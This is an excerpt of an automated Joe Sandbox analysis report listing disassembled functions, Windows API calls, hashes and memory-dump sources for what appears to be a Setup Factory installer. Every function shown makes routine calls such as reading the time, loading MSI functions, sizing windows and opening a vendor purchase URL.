                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$AddressLibraryLoadProc
                                                                                  • String ID: MsiVerifyPackageA
                                                                                  • API String ID: 2554327035-617025837
                                                                                  • Opcode ID: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                  • Instruction ID: 5317c853de453fce0b51c79f0143e77c63761dfe43dab1a235051b81588ab865
                                                                                  • Opcode Fuzzy Hash: 790839f8c71512b99d57245c700d90bd05dc14ba742a6c62093e8d9f9db9e15e
                                                                                  • Instruction Fuzzy Hash: 6E014936A00340B6DB00B7769C16FDF261C9F81754F00402FF816962C2DB7CDB8286A9
                                                                                  Function 004B5171 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,?,00000000,759235B0,?,?,0049E93D,00000000,?,?,004A0B84,?,?,00000000,?,00000104), ref: 004B517E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: =I$=I
                                                                                  • API String ID: 481472006-2664752910
                                                                                  • Opcode ID: 6202ca61bcceee69b485e76ac54275adb23bd6a23aa12004a09bdd3e74903f10
                                                                                  • Instruction ID: 9740a29a83fbc7630abca0604e625591134583bf64955ff80f28b19a921c0332
                                                                                  • Opcode Fuzzy Hash: 6202ca61bcceee69b485e76ac54275adb23bd6a23aa12004a09bdd3e74903f10
                                                                                  • Instruction Fuzzy Hash: F00184222463949AC301C79E84915E9BBA69BA6628F6C80CAF0C48B143D177C90FC362
                                                                                  Function 00450479 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0045047E
                                                                                    • Part of subcall function 0044EB4E: __EH_prolog.LIBCMT ref: 0044EB53
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: Checked$Variable
                                                                                  • API String ID: 2206737547-4072040582
                                                                                  • Opcode ID: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                  • Instruction ID: b557a114fa5ee7a457287e9b34bc29c61c141e3a3655fe4132f242bde0297ff1
                                                                                  • Opcode Fuzzy Hash: cfd47e58b2ab7f99a1e7c810ae55f731cdbff27362dadb22b499d4ca9119f751
                                                                                  • Instruction Fuzzy Hash: 2D0161356002046ACB19FB63C856AFE7766EFC1318F04856FF512A72C2CF7C6946C659
                                                                                  Function 00430E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00430E91
                                                                                    • Part of subcall function 0042E792: LoadLibraryA.KERNEL32(00000000), ref: 0046EB47
                                                                                  • GetProcAddress.KERNEL32(00000000,MsiCloseHandle), ref: 00430EA7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressH_prologLibraryLoadProc__ftol
                                                                                  • String ID: MsiCloseHandle
                                                                                  • API String ID: 924047275-1311317158
                                                                                  • Opcode ID: 896c4c96a903acb54d9c8c4634a0598b7483de657a47980061432fed733c7fd2
                                                                                  • Instruction ID: a140908561e65f26251b90fb59e3704b7c7a079241712bad899f0e9e6ead48c9
                                                                                  • Opcode Fuzzy Hash: 896c4c96a903acb54d9c8c4634a0598b7483de657a47980061432fed733c7fd2
                                                                                  • Instruction Fuzzy Hash: FDF0F032B4571171E62032372C17EEF054D4FC6795F09082BF806EA182EE6ECA83017E
                                                                                  Function 0045051B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00450520
                                                                                    • Part of subcall function 0044EDBD: __EH_prolog.LIBCMT ref: 0044EDC2
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: Checked$Variable
                                                                                  • API String ID: 2206737547-4072040582
                                                                                  • Opcode ID: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                  • Instruction ID: 1f622e6c72d5bdf31cba8138abd98f018be742c2bdca4c4ef77431c36a3b9ab4
                                                                                  • Opcode Fuzzy Hash: b07079e5009ae732146f6306a23669b85483aaddad9956d1c995492f19cdc0cf
                                                                                  • Instruction Fuzzy Hash: 13018435640204BFDB20EB52D846FED7B26EB80724F00C51EF516AB2C0C7B9AA41DB98
                                                                                  Function 00448347 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 0044835E
                                                                                    • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                  • GetWindowRect.USER32(?,00000000), ref: 00448371
                                                                                    • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D35
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D41
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447D9C
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447DF8
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E04
                                                                                    • Part of subcall function 00447CFA: GetWindowRect.USER32(?,?), ref: 00447E0D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$MoveShow
                                                                                  • String ID: @{D
                                                                                  • API String ID: 1313642680-849441126
                                                                                  • Opcode ID: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                  • Instruction ID: 9b8ab06f5678c24dba60b2739052b10a2f896333f4598c702bdb1458a4d54235
                                                                                  • Opcode Fuzzy Hash: 0565c334a675da7c4357cd9acd7f6c50ea5dba766a9dad78ff27870ac3f11563
                                                                                  • Instruction Fuzzy Hash: F2014F76900518BFDB15EFA9CD45EEEF7B8EF48300F00005EE512A31A0DA74AD01CB54
                                                                                  Function 00464589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046458E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: DecrementH_prologInterlockedlstrlen
                                                                                  • String ID: CustomCtrlInfo$CustomCtrlList
                                                                                  • API String ID: 2818505249-1052600778
                                                                                  • Opcode ID: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                  • Instruction ID: beb598171ee506bd90e5e93b1e4c99edef3199ae416f2fa069e764fcd08a2894
                                                                                  • Opcode Fuzzy Hash: 2a609cd160974749ad030957123f6410f801adf43dcc221db2bf98fc6f6877ce
                                                                                  • Instruction Fuzzy Hash: B3018176820258AADB08EB91C952FEEB774EF14314F10415FB112A30C1DBF83B44C7A5
                                                                                  Function 004B0B55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                  • GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesErrorFileLast
                                                                                  • String ID: -R
                                                                                  • API String ID: 1799206407-1098841771
                                                                                  • Opcode ID: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                  • Instruction ID: 1e009806bf59564d53b0f1126dcaa97511a66ca536c95479395ebd5686f6ada8
                                                                                  • Opcode Fuzzy Hash: d969712471747f66dc4e811ebc3538afd9c851a6b2b9d195b696d8486bbea4e8
                                                                                  • Instruction Fuzzy Hash: 1DE0863000824056CA423BB49D4A79F3A516F6132EF514B4FF071891F3CBBC8840973E
                                                                                  Function 0046CFC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteA.SHELL32(?,open,http://www.indigorose.com/route.php?pid=suf60buy,00000000,00000000,00000005), ref: 0046CFE0
                                                                                  Strings
                                                                                  • http://www.indigorose.com/route.php?pid=suf60buy, xrefs: 0046CFD5
                                                                                  • open, xrefs: 0046CFDA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID: http://www.indigorose.com/route.php?pid=suf60buy$open
                                                                                  • API String ID: 587946157-1258538472
                                                                                  • Opcode ID: 825ddeda57147c3d4a88a592c5220336ff53e716cd7c6ee4b2873e107d491d72
                                                                                  • Instruction ID: 8b58651f864518a8880106a16bc27bed32e4ba380bdb31e532dc1d9bef2b0b1f
                                                                                  • Opcode Fuzzy Hash: 825ddeda57147c3d4a88a592c5220336ff53e716cd7c6ee4b2873e107d491d72
                                                                                  • Instruction Fuzzy Hash: 04C08C713C4301B6FEAC66204C8AF2729416320F02F201C247202ED1C1F2E5D4428A0D